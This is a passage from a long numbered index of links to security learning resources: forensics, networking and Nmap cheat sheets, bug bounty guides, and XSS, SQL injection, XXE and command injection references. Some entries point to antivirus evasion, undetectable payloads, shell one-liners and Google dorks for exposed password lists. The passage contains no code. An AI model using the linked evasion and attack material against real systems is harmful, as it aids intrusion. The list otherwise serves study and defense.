Sheets - SANS Digital Forensics:\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n-822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n-823-Windows Registry Auditing Cheat Sheet:\n\n\nhttps://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology\n\n\n-824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know:\n\n\nhttps://kennyvn.com/cheatsheet-useful-bash-commands-linux/\n\n\n-825-kali-linux-cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition):\n\n\nhttps://securedyou.com/best-kali-linux-commands-terminal-hacking/\n\n\n-827-Kali Linux Commands Cheat Sheet:\n\n\nhttps://www.pinterest.com/pin/393431717429496576/\n\n\n-827-Kali Linux Commands Cheat Sheet A To Z:\n\n\nhttps://officialhacker.com/linux-commands-cheat-sheet/\n\n\n-828-Linux commands CHEATSHEET for HACKERS:\n\n\nhttps://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/\n\n\n-829-100 Linux Commands – A Brief Outline With Cheatsheet:\n\n\nhttps://fosslovers.com/100-linux-commands-cheatsheet/\n\n\n-830-Kali Linux – Penetration Testing Cheat Sheet:\n\n\nhttps://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/\n\n\n\n-831-Basic Linux Terminal Shortcuts Cheat Sheet :\n\n\nhttps://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/\n\n\n-832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} :\n\n\nhttps://itechhacks.com/kali-linux-and-linux-commands/\n\n\n-833-Transferring files from Kali to Windows (post exploitation):\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n-834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux:\n\n\nhttps://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet\n\n\n-835-What is 
penetration testing? 10 hacking tools the pros use:\n\n\nhttps://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html\n\n\n-836-Best Hacking Tools List for Hackers & Security Professionals in 2019:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n-837-ExploitedBunker PenTest Cheatsheet:\n\nhttps://exploitedbunker.com/articles/pentest-cheatsheet/\n\n\n-838-How to use Zarp for penetration testing:\n\n\nhttps://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/\n\n\n-839-Wireless Penetration Testing Cheat Sheet;\n\n\nhttps://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/\n\n\n-840-Pentest Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/pentest/\n\n\n-841-40 Best Penetration Testing (Pen Testing) Tools in 2019:\n\n\nhttps://www.guru99.com/top-5-penetration-testing-tools.html\n\n\n-842-Metasploit Cheat Sheet:\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n-843-OSCP useful resources and tools;\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n-844-Pentest + Exploit dev Cheatsheet:\n\n\nhttps://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/\n\n\n-845-What is Penetration Testing? 
A Quick Guide for 2019:\n\n\nhttps://www.cloudwards.net/penetration-testing/\n\n\n-846-Recon resource:\n\n\nhttps://pentester.land/cheatsheets/2019/04/15/recon-resources.html\n\n\n-847-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n\n\n-848-Recon Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/recon/\n\n\n-849-Penetration Testing Active Directory, Part II:\n\n\nhttps://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/\n\n\n-850-Reverse-engineering Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n-851-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n-852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS:\n\n\nhttps://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows\n\n\n-853-PROPagate:\n\n\nhttp://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/\n\n\n-854-Process Doppelgänging, by Tal Liberman and Eugene Kogan::\n\n\nhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\n\n\n-855-Gargoyle:\n\n\nhttps://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html\n\n\n-856-GHOSTHOOK:\n\n\nhttps://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/\n\n\n-857-Learn C:\n\n\nhttps://www.programiz.com/c-programming\n\n\n-858-x86 Assembly Programming Tutorial:\n\n\nhttps://www.tutorialspoint.com/assembly_programming/\n\n\n-859-Dr. 
Paul Carter's PC Assembly Language:\n\n\nhttp://pacman128.github.io/pcasm/\n\n\n-860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration:\n\n\nhttp://opensecuritytraining.info/IntroX86.html\n\n\n-861-x86 Disassembly:\n\n\nhttps://en.wikibooks.org/wiki/X86_Disassembly\n\n\n-862-use-of-dns-tunneling-for-cc-communications-malware:\n\n\nhttps://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/\n\n\n-863-Using IDAPython to Make Your Life Easier (Series)::\n\n\nhttps://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/\n\n\n-864-NET binary analysis:\n\n\nhttps://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/\n\n\n-865-detailed analysis of the BlackEnergy3 big dropper:\n\n\nhttps://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/\n\n\n-866-detailed analysis of Uroburos rootkit:\n\n\nhttps://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg\n\n\n-867-TCP/IP and tcpdump Pocket Reference Guide:\n\n\nhttps://www.sans.org/security-resources/tcpip.pdf\n\n\n-868-TCPDUMP Cheatsheet:\n\n\nhttp://packetlife.net/media/library/12/tcpdump.pdf\n\n\n-869-Scapy Cheatsheet:\n\n\nhttp://packetlife.net/media/library/36/scapy.pdf\n\n\n-870-WIRESHARK DISPLAY FILTERS:\n\n\nhttp://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf\n\n\n-871-Windows command line sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf\n\n\n-872-Metasploit cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf\n\n\n-873-IPv6 Cheatsheet:\n\n\nhttp://packetlife.net/media/library/8/IPv6.pdf\n\n\n-874-IPv4 Subnetting:\n\n\nhttp://packetlife.net/media/library/15/IPv4_Subnetting.pdf\n\n\n-875-IOS IPV4 ACCESS LISTS:\n\n\nhttp://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf\n\n\n-876-Common Ports 
List:\n\n\nhttp://packetlife.net/media/library/23/common_ports.pdf\n\n\n-877-WLAN:\n\n\nhttp://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf\n\n\n-878-VLANs Cheatsheet:\n\n\nhttp://packetlife.net/media/library/20/VLANs.pdf\n\n\n-879-VoIP Basics CheatSheet:\n\n\nhttp://packetlife.net/media/library/34/VOIP_Basics.pdf\n\n\n-880-Google hacking and defense cheat sheet:\n\n\nhttps://www.sans.org/security-resources/GoogleCheatSheet.pdf\n\n\n-881-Nmap CheatSheet:\n\n\nhttps://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0\n\n\n\n-882-Netcat cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf\n\n\n-883-PowerShell cheat sheet:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf\n\n\n-884-Scapy cheat sheet POCKET REFERENCE:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf\n\n\n-885-SQL injection cheat sheet.:\n\n\nhttps://information.rapid7.com/sql-injection-cheat-sheet-download.html\n\n\n-886-Injection cheat sheet:\n\n\nhttps://information.rapid7.com/injection-non-sql-cheat-sheet-download.html\n\n\n-887-Symmetric Encryption Algorithms cheat sheet:\n\n\nhttps://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/\n\n\n-888-Intrusion Discovery Cheat Sheet v2.0 for Linux:\n\n\nhttps://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf\n\n\n-889-Intrusion Discovery Cheat Sheet v2.0 for Window:\n\n\nhttps://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf\n\n\n-890-Memory Forensics Cheat Sheet v1.2:\n\n\nhttps://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf\n\n\n-891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH:\n\n\nhttps://www.sans.org/brochure/course/log-management-in-depth/6\n\n\n-892-Evidence collection cheat sheet:\n\n\nhttps://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf\n\n\n-893-Hex file and regex cheat sheet 
v1.0:\n\n\nhttps://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf\n\n\n-894-Rekall Memory Forensic Framework Cheat Sheet v1.2.:\n\n\nhttps://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf\n\n\n-895-SIFT WORKSTATION Cheat Sheet v3.0.:\n\n\nhttps://digital-forensics.sans.org/media/sift_cheat_sheet.pdf\n\n\n-896-Volatility Memory Forensic Framework Cheat Sheet:\n\n\nhttps://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf\n\n\n-897-Hands - on Network Forensics.:\n\n\nhttps://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf\n\n\n-898-VoIP Security Vulnerabilities.:\n\n\nhttps://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036\n\n\n-899-Incident Response: How to Fight Back:\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342\n\n\n-900-BI-7_VoIP_Analysis_Fundamentals:\n\n\nhttps://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf\n\n\n-901-Bug Hunting Guide:\n\n\ncybertheta.blogspot.com/2018/08/bug-hunting-guide.html\n\n\n-902-Guide 001 |Getting Started in Bug Bounty Hunting:\n\n\nhttps://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun...\n\n\n-903-SQL injection cheat sheet :\n\n\nhttps://portswigger.net › Web Security Academy › SQL injection › Cheat sheet\n\n\n-904-RSnake's XSS Cheat Sheet:\n\n\nhttps://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/\n\n\n-905-Bug Bounty Tips (2):\n\n\nhttps://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/\n\n\n-906-A Review of my Bug Hunting Journey:\n\n\nhttps://kongwenbin.com/a-review-of-my-bug-hunting-journey/\n\n\n-907-Meet the First Hacker Millionaire on HackerOne:\n\n\nhttps://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/\n\n\n-908-XSS Cheat Sheet:\n\n\nhttps://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/\n\n\n-909-Bug Bounty 
Hunter Methodology:\n\n\nhttps://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016\n\n\n-910-#10 Rules of Bug Bounty:\n\n\nhttps://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c\n\n\n-911-Bugbounty Checklist:\n\n\nhttps://www.excis3.be/bugbounty-checklist/21/\n\n\n-912-FireBounty | The Ultimate Bug Bounty List!:\n\n\nhttps://firebounty.com/\n\n\n-913-Brutelogic xss cheat sheet 2019:\n\n\nhttps://brutelogic.com.br/blog/ebook/xss-cheat-sheet/\n\n\n-914-XSS Cheat Sheet by Rodolfo Assis:\n\n\nhttps://leanpub.com/xss\n\n\n-915-Cross-Site-Scripting (XSS) – Cheat Sheet:\n\n\nhttps://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/\n\n\n-916-XSS Cheat Sheet V. 2018 :\n\n\nhttps://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/\n\n\n-917-Cross-site Scripting Payloads Cheat Sheet :\n\n\nhttps://exploit.linuxsec.org/xss-payloads-list\n\n\n-918-Xss Cheat Sheet :\n\n\nhttps://www.in-secure.org/tag/xss-cheat-sheet/\n\n\n-919-Open Redirect Cheat Sheet :\n\n\nhttps://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n\n\n-920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet:\n\n\nhttps://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php\n\n\n-921-XSS Cheat Sheet:\n\n\nhttps://tools.paco.bg/13/\n\n\n-922-XSS for ASP.net developers:\n\n\nhttps://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers\n\n\n-923-Cross-Site Request Forgery Cheat Sheet:\n\n\nhttps://trustfoundry.net/cross-site-request-forgery-cheat-sheet/\n\n\n-924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n-925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet :\n\n\nhttps://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee...\n\n\n-926-Guide to CSRF (Cross-Site Request Forgery):\n\n\nhttps://www.veracode.com/security/csrf\n\n\n-927-Cross-site Request Forgery - Exploitation & 
Prevention:\n\n\nhttps://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/\n\n\n-928-SQL Injection Cheat Sheet :\n\n\nhttps://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/\n\n\n-929-MySQL SQL Injection Practical Cheat Sheet:\n\n\nhttps://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/\n\n\n-930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/SQLi\n\n\n-931-SQL injection attacks: A cheat sheet for business pros:\n\n\nhttps://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/\n\n\n-932-The SQL Injection Cheat Sheet:\n\n\nhttps://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon\n\n\n-933-SQL Injection Cheat Sheet:\n\n\nhttps://resources.infosecinstitute.com/sql-injection-cheat-sheet/\n\n\n-934-Comprehensive SQL Injection Cheat Sheet:\n\n\nhttps://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/\n\n\n-935-MySQL SQL Injection Cheat Sheet:\n\n\npentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet\n\n\n-936-SQL Injection Cheat Sheet: MySQL:\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/\n\n\n-937- MySQL Injection Cheat Sheet:\n\n\nhttps://www.asafety.fr/mysql-injection-cheat-sheet/\n\n\n-938-SQL Injection Cheat Sheet:\n\n\nhttps://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/\n\n\n-939-Google dorks cheat sheet 2019:\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-940-Command Injection Cheatsheet :\n\n\nhttps://hackersonlineclub.com/command-injection-cheatsheet/\n\n\n-941-OS Command Injection Vulnerability:\n\n\nhttps://www.immuniweb.com/vulnerability/os-command-injection.html\n\n\n-942-OS Command Injection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection\n\n\n-943-Command Injection: The Good, the Bad and the 
Blind:\n\n\nhttps://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/\n\n\n-944-OS command injection:\n\n\nhttps://portswigger.net › Web Security Academy › OS command injection\n\n\n-945-How to Test for Command Injection:\n\n\nhttps://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html\n\n\n-946-Data Exfiltration via Blind OS Command Injection:\n\n\nhttps://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection\n\n\n-947-XXE Cheatsheet:\n\n\nhttps://www.gracefulsecurity.com/xxe-cheatsheet/\n\n\n-948-bugbounty-cheatsheet/xxe.:\n\n\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md\n\n\n-949-XXE - Information Security:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-950-XXE Cheat Sheet:\n\n\nhttps://www.hahwul.com/p/xxe-cheat-sheet.html\n\n\n-951-Advice From A Researcher: Hunting XXE For Fun and Profit:\n\n\nhttps://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/\n\n\n-952-Out of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-953-Web app penentration testing checklist and cheatsheet:\n\n\nwww.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example\n\n\n\n-954-Useful Resources:\n\n\nhttps://lsdsecurity.com/useful-resources/\n\n\n-955-Exploiting XXE Vulnerabilities in IIS/.NET:\n\n\nhttps://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti...\n\n\n-956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE:\n\n\nhttps://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/\n\n\n-957-Hacking Resources:\n\n\nhttps://www.torontowebsitedeveloper.com/hacking-resources\n\n\n-958-Out of Band XML External Entity Injection:\n\n\nhttps://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio...\n\n\n-959-XXE - ZeroSec - Adventures In Information Security:\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n-960-Blog 
- Automated Data Exfiltration with XXE:\n\n\nhttps://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html\n\n\n-961-My Experience during Infosec Interviews:\n\n\nhttps://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8\n\n\n-962-Top 10 Security Risks on the Web (OWASP):\n\n\nhttps://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t...\n\n\n-963-Antivirus Evasion Tools [Updated 2019] :\n\n\nhttps://resources.infosecinstitute.com/antivirus-evasion-tools/\n\n\n-964-Adventures in Anti-Virus Evasion:\n\n\nhttps://www.gracefulsecurity.com/anti-virus-evasion/\n\n\n-965-Antivirus Bypass Phantom Evasion - 2019 :\n\n\nhttps://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/\n\n\n-966-Antivirus Evasion with Python:\n\n\nhttps://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1\n\n\n-967-Windows oneliners to get shell:\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n-968-Does Veil Evasion Still Work Against Modern AntiVirus?:\n\n\nhttps://www.hackingloops.com/veil-evasion-virustotal/\n\n\n-969-Google dorks cheat sheet 2019 :\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-970-Malware Evasion Techniques :\n\n\nhttps://www.slideshare.net/ThomasRoccia/malware-evasion-techniques\n\n\n-971-How to become a cybersecurity pro: A cheat sheet:\n\n\nhttps://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/\n\n\n-972-Bypassing Antivirus With Ten Lines of Code:\n\n\nhttps://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html\n\n\n-973-Bypassing antivirus detection on a PDF exploit:\n\n\nhttps://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit\n\n\n-974-Generating Payloads & Anti-Virus Bypass Methods:\n\n\nhttps://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/\n\n\n-975-Apkwash Android Antivirus Evasion 
For Msfvemon:\n\n\nhttps://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/\n\n\n-976-Penetration Testing with Windows Computer & Bypassing an Antivirus:\n\n\nhttps://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus\n\n\n-978-Penetration Testing: The Quest For Fully UnDetectable Malware:\n\n\nhttps://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware\n\n\n-979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework :\n\n\nhttps://githacktools.blogspot.com \n\n\n-980-Creating an undetectable payload using Veil-Evasion Toolkit:\n\n\nhttps://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/\n\n\n-981-Evading Antivirus :\n\n\nhttps://sathisharthars.com/tag/evading-antivirus/\n\n\n-982-AVPASS – All things in moderation:\n\n\nhttps://hydrasky.com/mobile-security/avpass/\n\n\n-983-Complete Penetration Testing & Hacking Tools List:\n\n\nhttps://cybarrior.com/blog/2019/03/31/hacking-tools-list/\n\n\n\n-984-Modern red teaming: 21 resources for your security team:\n\n\nhttps://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team\n\n\n-985-BloodHound and CypherDog Cheatsheet :\n\n\nhttps://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/\n\n\n\n-986-Redteam Archives:\n\n\nhttps://ethicalhackingguru.com/category/redteam/\n\n\n-987-NMAP Commands Cheat Sheet:\n\n\nhttps://www.networkstraining.com/nmap-commands-cheat-sheet/\n\n\n-988-Nmap Cheat Sheet:\n\n\nhttps://dhound.io/blog/nmap-cheatsheet\n\n\n-989-Nmap Cheat Sheet: From Discovery to Exploits:\n\n\nhttps://resources.infosecinstitute.com/nmap-cheat-sheet/\n\n\n-990-Nmap Cheat Sheet and Pro Tips:\n\n\nhttps://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/\n\n\n-991-Nmap Tutorial: from the Basics to Advanced Tips:\n\n\nhttps://hackertarget.com/nmap-tutorial/\n\n\n-992-How to run a complete network scan with 
OpenVAS;\n\n\nhttps://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/\n\n\n\n-993-Nmap: my own cheatsheet:\n\n\nhttps://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/\n\n\n-994-Top 32 Nmap Command Examples For Linux Sys/Network Admins:\n\n\nhttps://www.cyberciti.biz/security/nmap-command-examples-tutorials/\n\n\n-995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker:\n\n\nhttps://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html\n\n\n-996-Scanning Tools:\n\n\nhttps://widesecurity.net/kali-linux/kali-linux-tools-scanning/\n\n\n-997-Nmap - Cheatsheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/\n\n\n-998-Linux for Network Engineers:\n\n\nhttps://netbeez.net/blog/linux-how-to-use-nmap/\n\n\n-999-Nmap Cheat Sheet:\n\n\nhttps://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/\n\n\n-1000-Tactical Nmap for Beginner Network Reconnaissance:\n\n\nhttps://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss...\n\n\n\n-1001-A Guide For Google Hacking Database:\n\n\nhttps://www.hackgentips.com/google-hacking-database/\n\n\n-1002-2019 Data Breaches - The Worst Breaches, So Far:\n\n\nhttps://www.identityforce.com/blog/2019-data-breaches\n\n\n-1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills:\n\n\nhttps://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills\n\n\n\n-1004-Google Hacking Master List :\n\n\nhttps://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408\n\n\n-1005-Smart searching with googleDorking | Exposing the Invisible:\n\n\nhttps://exposingtheinvisible.org/guides/google-dorking/\n\n\n-1006-Google Dorks 2019:\n\n\nhttps://korben.info/google-dorks-2019-liste.html\n\n\n-1007-Google Dorks List and how to use it for Good;\n\n\nhttps://edgy.app/google-dorks-list\n\n\n-1008-How to Use Google to 
Hack(Googledorks):\n\n\nhttps://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/\n\n\n-1009-Using google as hacking tool:\n\n\nhttps://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht...\n\n\n-1010-#googledorks hashtag on Twitter:\n\n\nhttps://twitter.com/hashtag/googledorks\n\n\n-1011-Top Five Open Source Intelligence (OSINT) Tools:\n\n\nhttps://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/\n\n\n-1012-What is open-source intelligence (OSINT)?:\n\n\nhttps://www.microfocus.com/en-us/what-is/open-source-intelligence-osint\n\n\n\n-1013-A Guide to Open Source Intelligence Gathering (OSINT):\n\n\nhttps://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c\n\n\n-1014-OSINT: How to find information on anyone:\n\n\nhttps://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56\n\n\n-1015-What is OSINT? How can I make use of it?:\n\n\nhttps://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it\n\n\n-1016-OSINT Tools for the Dark Web:\n\n\nhttps://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/\n\n\n-1017-A Guide to Open Source Intelligence (OSINT):\n\n\nhttps://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php\n\n\n-1018-An Introduction To Open Source Intelligence (OSINT):\n\n\nhttps://www.secjuice.com/introduction-to-open-source-intelligence-osint/\n\n\n-1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive:\n\n\nhttps://www.aptive.co.uk/blog/tls-ssl-security-testing/\n\n\n-1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]:\n\n\nhttps://www.exploit-db.com/ghdb/4262/?source=ghdbid\n\n\n-1021-cheat_sheets:\n\n\nhttp://zachgrace.com/cheat_sheets/\n\n\n-1022-Intel SYSRET:\n\n\nhttps://pentestlab.blog/2017/06/14/intel-sysret\n\n\n-1023-Windows Preventive Maintenance Best 
Practices:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/\n\n\n-1024-An Overview of Storage Devices:\n\n\nhttp://www.professormesser.com/?p=19367\n\n\n-1025-An Overview of RAID:\n\n\nhttp://www.professormesser.com/?p=19373\n\n\n-1026-How to Troubleshoot:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/\n\n\n-1027-Mobile Device Security Troubleshooting:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/\n\n\n-1028-Using Wireshark: Identifying Hosts and Users:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n-1029-Using Wireshark - Display Filter Expressions:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/\n\n\n-1030-Decrypting SSL/TLS traffic with Wireshark:\n\n\nhttps://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/\n\n\n-1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.:\n\n\nhttps://onceupon.github.io/Bash-Oneliner/\n\n\n-1032- Bash One-Liners Explained, Part I: Working with files :\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-one\n\n\n-1033-Bash One-Liners Explained, Part IV: Working with history:\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-four\n\n\n-1034-Useful bash one-liners :\n\n\nhttps://github.com/stephenturner/oneliners\n\n\n-1035-Some Random One-liner Linux Commands [Part 1]:\n\n\nhttps://www.ostechnix.com/random-one-liner-linux-commands-part-1/\n\n\n-1036-The best terminal one-liners from and for smart admins + devs.:\n\n\nhttps://www.ssdnodes.com/tools/one-line-wise/\n\n\n\n-1037-Shell one-liner:\n\n\nhttps://rosettacode.org/wiki/Shell_one-liner#Racket\n\n\n-1038-SSH Cheat Sheet:\n\n\nhttp://pentestmonkey.net/tag/ssh\n\n\n\n-1039-7000 Google Dork List:\n\n\nhttps://pastebin.com/raw/Tdvi8vgK\n\n\n-1040-GOOGLE 
